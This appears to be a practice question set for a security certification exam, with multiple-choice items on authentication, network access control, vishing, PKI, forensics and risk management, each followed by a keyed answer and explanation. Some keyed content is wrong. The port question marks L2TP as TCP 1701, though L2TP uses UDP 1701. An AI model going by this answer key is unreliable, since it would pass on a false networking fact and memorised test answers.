A term used to identify an authentication scheme that involves both sides of the communication authenticating is: A.Hashing B.Single sign-on C.Mutual authentication D.Nonrepudiation
C.Mutual authentication Correct Answer: Mutual authentication requires both sides of a communications session to authenticate to each other. Incorrect Answers: B.Single sign-on (SSO) is a concept that provides for one authentication to be used for multiple resources. D.Nonrepudiation ensures that a party cannot deny that it took an action. A.Hashing involves a one-way function that produces a message digest from a piece of text.
Bob logs on to the network and receives a message indicating that patches are not up to date and that he cannot be granted access to the network until patches are updated. What network feature is responsible for the message? A.NAT B.VPN C.NAC D.TPM
C.NAC Correct Answer: Network access control (NAC) can be used to prevent hosts from connecting to the network unless they meet certain security requirements, such as patch level, up-to-date antivirus signatures, and so forth. Incorrect Answers: None of these other technologies are concerned with enforcing host security requirements prior to connecting to the network.
Which device, when implemented with VLANs, can help reduce both collision and the size of broadcast domains? A.Router B.Bridge C.Hub D.Switch
D.Switch Switches natively help reduce collision domains and, when VLANs are implemented on them, help reduce broadcast domains. Incorrect Answers: A&B.Routers can help reduce or eliminate broadcast domains, and bridges can help reduce collision domains, but neither of these devices use VLANs. C.Hubs do not reduce collision or broadcast domains.
Which of the following terms refers to the practices of stealing or obtaining a user?s personal or account information, typically using voice over IP (VoIP) systems? A.VoIP B.Whaling C.Phishing D.Vishing
D.Vishing Vishing (a combination of the terms voice and phishing) refers to social engineering attacks that make use of VoIP systems to spoof phone numbers, hide caller IDs, and so forth, to obtain personal or account information from unsuspecting users. Incorrect Answers: C.Phishing involves the use of e-mail targeted to users with a malicious web site link embedded in the e-mail. B.Whaling involves specifically targeting senior-level executives of an organization for social engineering attacks. A.VoIP hijacking is a nonexistent term in this context.
Which type of assessment is used to determine weaknesses within a system? A.Penetration test B.Risk assessment C.Threat assessment D.Vulnerability assessment
D.Vulnerability assessment A vulnerability assessment looks for weaknesses in systems. Incorrect Answers: C.A threat assessment looks at events that could exploit vulnerabilities. B.A risk assessment is a combination of assessments and is designed to assess factors, including likelihood and impact, that affect an asset. A.A penetration test actually attempts to exploit any found weaknesses (usually after a vulnerability assessment) to gain access to systems.
All of the following are considered elements of a password policy EXCEPT: A.Password sharing B.Password history C.Password aging D.Password complexity
A. Password sharing Correct Answer: Password sharing typically will be in the acceptable use policy (AUP), as a directive to users about what they can and cannot do. Incorrect Answers: Password history, aging, and complexity will all typically be found in a password policy, as technical elements that describe how passwords should be constructed, implemented, and managed by administrators.
Jeff is a user on the network and needs to be able to change the system time. Instead of adding Jeff to the Administrators group, you give Jeff the "Change the system time" right. What security principle are you following in this example? A.Least privilege B.Discretionary access control C.Role-based access control D.Separation of duties
A.Least privilege The principle of least privilege allows users to have only the privileges necessary to perform their duties and no more. Incorrect Answers: D.Separation of duties requires critical roles to be split among personnel so no one user has the privileges to commit fraud or to abuse his or her role. B&C.Role-based access control and discretionary access control are access control models.
Which of the following ports would be most likely to allow secure remote access into a system within a data center? A.TCP port 1701 B.UDP port 53 C.UDP port 123 D.TCP port 443
A.TCP port 1701 L2TP aligns to TCP port 1701, allowing secure remote access to a system through a VPN connection. Incorrect Answer: B.UDP port 53 aligns to the Domain Name Service(DNS), C.UDP port 123 is used by Network Time Protocol (NTP) services, D.TCP port 443 is used by HTTP over SSL.
Which of the following terms is defined as something that can cause harm to an asset? A.Threat B.Risk C.Vulnerability D.Loss
A.Threat. A threat is defined as an entity or event that has the potential to cause harm or damage to an asset. A threat could cause the organization to suffer a financial loss. Incorrect Answers: B.Risk is the possibility that a threat could harm an asset. C.A vulnerability is a weakness in the system. D.A loss is what damage occurs when a vulnerability is exploited by a threat.
Your manager is interested in implementing a strong authentication scheme. Which of the following is considered the strongest authentication? A.Fingerprint B.Iris scan C.Username/password D.PIN
B.Iris scan Out of the choices given, an iris scan is the strongest method of authentication, as these patterns are very unique to individuals. Of all of the biometric authentication methods, including voiceprint and fingerprints, iris scans are most accurate. Incorrect Answers: C.Username and password combinations are not considered strong methods of authentication, as would be a PIN by itself. These are all considered single-factor forms of authentication. A.Fingerprints are not considered as strong a method of biometric authentication as iris scans.
Which authentication protocol uses Microsoft Point-to-Point Encryption (MPPE) protocol to encrypt all traffic from the client to the server? A.Kerberos B.MS-CHAP C.EAP D.CHAP
B.MS-CHAP Microsoft CHAP (MS-CHAP) uses Microsoft Point-to-Point Encryption (MPPE) protocol to encrypt all traffic from the client to the server. Incorrect Answers: A.&C.Neither EAP nor Kerberos uses MPPE. D.CHAP is the nonproprietary version and uses MD5 as its hashing algorithm.
Ashlyn, the senior security officer within your organization, has requested that you create a plan for an active security test that tries to bypass the security controls of an asset. What type of test would you plan? A.Risk assessment B.Penetration test C.Vulnerability scan D.Code review
B.Penetration test A penetration test is considered an active test because you are actually interacting with the target system and trying to bypass the security controls. Incorrect Answers: C.A vulnerability scan is considered a passive test because it only involves reviewing the configuration of a system to determine if there are any vulnerabilities. A.A risk assessment helps identify risks for each asset. D.A code review involves reviewing the code of an application to look for flaws.
You wish to send an encrypted message to Bob. Which of the following is used to encrypt a message sent to Bob in a PKI environment? A.Hash value B.Public key C.Symmetric key D.Private key
B.Public key Bob's public key is used to encrypt a message for him. Bob would then decrypt the message with his private key. Incorrect Answers: C.Symmetric keys and hashes are not used to encrypt a message to an individual in a PKI environment. D.The private key would be used to decrypt, not encrypt, the message in this scenario.
Which of the following is the most volatile source of evidence and should be collected first during a computer forensics investigation? A.CD/DVDs B.RAM C.Hard disks D.Swap file
B.RAM RAM is the most volatile source of information and is easily lost. It must be collected first during a computer forensics investigation. Incorrect Answers: The order of volatility, and order of evidence collection, is RAM, swap file, hard disk, and CD/DVDs.
What type of file, often sent with an e-mail message, can contain malicious code that can be downloaded and executed on a client's computer? A.Cross-site script B.Locally shared object C.HTML attachment D.Cookie
C.HTML attachment Any form of attachment is a risk. An HTML attachment is basically an HTML file that comes attached to an e-mail message. When a user clicks this attachment, it automatically spawns a browser session and could connect to a malicious Web site. Once the user is connected to the site, malicious code can be downloaded onto the user's browser. Incorrect Answers: Neither cookies, locally shared objects, nor cross-site scripts are attached to e-mail messages.
All of the following are valid 5.0 Risk Management strategies EXCEPT: A.Risk acceptance B.Risk mitigation C.Risk elimination D.Risk transference
C.Risk elimination Correct Answer: Risk can never be completely eliminated, only dealt with. Incorrect Answers: These are all valid 5.0 Risk Management strategies.